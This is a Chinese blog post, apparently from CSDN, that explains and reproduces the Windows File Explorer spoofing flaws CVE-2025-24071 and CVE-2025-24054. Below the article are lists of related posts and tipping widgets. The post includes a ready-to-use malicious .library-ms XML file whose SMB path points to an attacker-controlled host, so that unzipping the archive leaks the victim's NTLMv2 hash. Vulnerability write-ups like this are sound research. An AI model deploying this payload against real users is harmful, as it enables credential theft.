Microsoft Windows 文件资源管理器欺骗漏洞(CVE-2025-24071) / NTLM 哈希泄露欺骗漏洞(CVE-2025-24054)复现

原创 已于 2025-03-22 13:19:51 修改 · 3.1k 阅读 · 42
标签
#网络 #安全 #windows #CVE
于 2025-03-22 13:01:39 首次发布

漏洞原理

总的来说,这两个CVE是通过RAR/ZIP提取.library-ms文件,对文件资源管理器欺骗,从而造成NTLM哈希泄漏

当包含 SMB 路径的特制.library-ms文件被压缩到 RAR/ZIP 存档中并随后解压时,Windows 资源管理器会根据其内置的索引和预览机制自动解析此文件的内容。出现此行为的原因是,Windows 资源管理器在解压时会自动处理某些文件类型以生成预览、缩略图或索引元数据,即使用户从未明确打开或单击该文件。

.library-ms文件格式基于 XML,Windows 资源管理器会信任它来定义搜索和库位置。提取后,索引服务和资源管理器的内置文件解析机制会立即分析.library-ms文件内容以呈现适当的图标、缩略图或元数据信息。

所以可以提供包含<simpleLocation>标签的文件,直接指向攻击者控制的 SMB 服务器,比如设置为192.168.8.132

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.168.8.132\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

提取后,Windows 资源管理器会尝试自动解析\\192.168.8.132\shared以收集元数据和索引文件信息。此操作会触发从受害者系统到攻击者控制的 SMB 服务器的隐式 NTLM 身份验证握手。因此,受害者的 NTLMv2 哈希会在没有明确用户交互的情况下发送。

影响版

最低0.47元/天 解锁文章
CVE-2025-24071 Windows文件资源管理器欺骗漏洞复现
小林说安全的博客
03-22 5129
本文对Microsoft Windows文件资源管理器中存在的欺骗漏洞(CVE-2025-24071)进行详细技术分析,包括漏洞原理、复现过程、流量分析及防护建议。
漏洞预警 | Windows 文件资源管理器欺骗漏洞CVE-2025-24071CVE-2025-24054
C20220511的博客
03-31 1663
当压缩包内存在此类文件时,用户解压包含smb(文件共享服务)路径配置的libray-ms文件,会自动被windows资源管理器内置文件解析机制解析,将受害者的NTLM身份信息发送到攻击者smb服务器。攻击者可以利用该漏洞以管理员权限执行操作,包括但不限于创建新用户、修改现有用户的权限、安装恶意软件等。近日,微软发布windows操作系统更新修复漏洞,其中Windows 文件资源管理器欺骗漏洞CVE-2025-24071CVE-2025-24054)正被广泛利用,建议您及时开展安全风险自查。
CVE-2025-24071-windows文件资源管理器欺骗漏洞复现
m0_71099018的博客
10-04 763
Windows文件资源管理器(File Explorer)是Windows操作系统的核心组件,主要用于浏览、管理和操作本地及网络文件文件夹、驱动器等资源。它提供直观的图形化界面,支持文件创建、复制、移动、删除、重命名等基础操作,同时集成网络共享访问、外部设备管理、文件搜索与筛选等高级功能,是多任务文件处理的核心工具‌。
小白也能看懂的CVE-2025-24071漏洞原理剖析
vortex5的博客
03-30 3551
首先,CVE是什么意思呢?CVE是“通用漏洞披露”(Common Vulnerabilities and Exposures)的缩写,它就像一个全球通用的漏洞“身份证号”,用来标记和追踪计算机系统中的安全问题。CVE-2025-240712025年发现的一个具体漏洞,影响的是Windows操作系统中的文件资源管理器。这个漏洞的危险之处在于,攻击者可以利用它偷走你的NTLM哈希(一种跟密码相关的数字指纹),然后用它来冒充你,进入你的电脑或者网络
Windows文件管理器重大漏洞,无需交互,PoC已发布
FreeBuf_的博客
03-21 1636
Windows文件管理器中发现了一个名为CVE-2025-24071的关键漏洞,攻击者只需解压压缩文件即可窃取用户的NTLM哈希密码,无需用户进行任何交互。
Windows资源管理器漏洞复现与研究(CVE-2025-24071CVE-2025-24054)
weixin_42100387的博客
05-13 1536
Windows资源管理器漏洞复现与研究(CVE-2025-24071CVE-2025-24054)
漏洞复现CVE-2025-24071Windows文件资源管理器欺骗漏洞
信安百科
04-12 810
漏洞复现CVE-2025-24071Windows文件资源管理器欺骗漏洞
Zyxel Telnet 漏洞分析(CVE-2025-0890、CVE‑2024‑40891)
2401_85280228的博客
02-27 2073
参考资料这是2025年开年分析的第一个洞。2月4日 Zyxel 发布安全公告,旗下部分旧款 DSL 客户终端设备(CPE)存在严重的安全漏洞[1],包括 默认凭证不安全问题 和 命令注入漏洞 ,攻击者可通过默认凭证登录 Telnet 并利用此漏洞在受影响的设备上执行任意命令。
[复现] CVE-2025-24071
安全小白,希望我的文章对你有所帮助。
07-09 348
‍。
【系统安全Windows文件资源管理器欺骗(CVE-2025-24054CVE-2025-50154)
李同學AI安全
09-04 2060
Windows文件资源管理器高危漏洞CVE-2025-50154)攻击者可通过制作恶意LNK文件,利用图标加载机制绕过补丁防护,在用户仅浏览文件夹时自动触发与远程SMB服务器的连接,窃取NTLMv2认证凭证。该漏洞影响Windows 10/11及多版本服务器系统,已发现绕过此前补丁CVE-2025-24054的新攻击手法,攻击者只需将LNK文件图标指向本地Shell32.dll,可执行路径设为远程SMB文件即可实现攻击。微软已发布新补丁,建议用户及时更新。
管道魔法木马利用Windows零日漏洞部署勒索软件,从零基础到精通,收藏这篇就够了!_cve-2025-29824
bdfcfff77fa的博客
04-23 890
微软最近承认,自家后院又着火了——一个影响Windows通用日志文件系统(CLFS)的安全漏洞,编号CVE-2025-29824。这玩意儿可不是闹着玩的,已经被黑客当成零日漏洞,精准打击了一小撮倒霉蛋,背后还牵扯到勒索软件的黑幕。微软这次点名了几家,说受害者里有美国的信息技术(IT)和房地产行业组织,听起来像是基础设施或者关键服务提供商。更耐人寻味的是,还有委内瑞拉的金融机构、西班牙的软件公司,甚至连沙特阿拉伯的零售巨头也未能幸免。这是什么节奏?全球开花?还是说,攻击者另有所图?
「Nginx漏洞复现与防御实战|2024最新CVE解析(含目录遍历/文件解析绕过/反向代理漏洞EXP复现+安全加固方案)渗透测试工程师必看」
热门推荐
盾悟
03-02 1万+
通过访问config.do配置页面,先更改Work Home工作目录,用有效的已部署的Web应用目录替换默认的存储JKS Keystores文件的目录,之后使用"添加Keystore设置"的功能,可上传恶意的JSP脚本文件。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致恶意构造的代码的实现。IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。
图片服务器
whinsist的专栏
07-05 337
1.图片服务器源码 2.图片服务器tomcat配置(tomcat/config/web.xml)         default         org.apache.catalina.servlets.DefaultServlet                     debug             0
Tomcat RCE(CVE-2025-24813)复现
Neolock的博客
03-21 4191
它由 Apache 软件基金会下的 Jakarta 项目开发,是目前最流行的 Java Web 服务器之一。这里需要注意Content-Range的分块值需要与Content-Length保持一致,且大于当前文件的长度。我们都知道tomcat是Java语言开发的,所以需要JAVA环境,我这里的Java环境是1.8.0_441。当文件被上传成功后,大概30s之内payload会被自动触发,随之文件会被清除。
CVE-2025-33073 NTLM反射 权限提升漏洞复现
渗透之路,攻防之间皆学问
06-18 4725
CVE-2025-33073是一个高危Windows SMB客户端漏洞,可通过NTLM/Kerberos认证反射实现域内SYSTEM权限提权。攻击者只需普通域账号,在满足目标主机未强制SMB签名且域DNS可被篡改的条件下,即可通过构造特殊DNS记录(如server11UWhRC...指向攻击机)、启动SMB中继服务(ntlmrelayx.py)和触发NTLM认证(PetitPotam)三个步骤,将认证反射回目标主机自身,最终获取SYSTEM权限。该漏洞影响所有未安装2025年6月补丁且未启用SMB签名的域内
0click漏洞重现:新型LNK文件绕过补丁导致NTLM凭据泄露CVE-2025-50154)
最新发布
FreeBuf_的博客
10-17 1169
新型LNK漏洞绕过微软补丁,零点击窃取NTLM凭据。
【内网渗透】也聊CVE-2025-33073 NTLM Reflection攻击
uuzeray的博客
06-19 2729
CVE-2025-33073 漏洞属于 NTLM Reflection(NTLM反射)攻击,而NTLM Reflection攻击是NTLM Relay(NTLM 中继)攻击的一种特殊形式,指的是将获得的受害者机器的NTLM认证请求重新反射回发送该请求的原始机器(即受害者机器)通过利用该漏洞,攻击者只要有任意权限的域用户权限且目标机器不开启 SMB 签名就能远程命令执行,而在大部分情况下,SMB 签名默认只有域控开,域内机器大多数是不开的。进行强制触发,让目标机器向指定DNS记录进行NTLM认证。
OpenSSH高危漏洞CVE-2025-26466和CVE-2025-26465:OpenSSH升级9.9p2 RPM一键更新包
天天打码-16年老码农
04-14 5068
OpenSSH近期出现拒绝服务漏洞CVE-2025-26466和CVE-2025-26465,影响范围: OpenSSH 6.8p1 至 9.9p1、 OpenSSH 9.5p1 至 9.9p1, OpenSSH升级9.9p2 RPM一键更新包。
CVE-2025-26466和CVE-2025-26465离线修复方案(老版本升级方案)
baidu_25691461的博客
03-28 3965
OpenSSH(OpenBSD Secure Shell)是加拿大 OpenBSD 计划组的一套用于安全。OpenSSH(OpenBSD Secure Shell)是加拿大 OpenBSD 计划组的一套用于安全。传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。该工具是 SSH 协议的开源实现,支持对所有的。该工具是 SSH 协议的开源实现,支持对所有的。打开/etc/ssh/sshd_config找到82行并注释。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Neolock

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值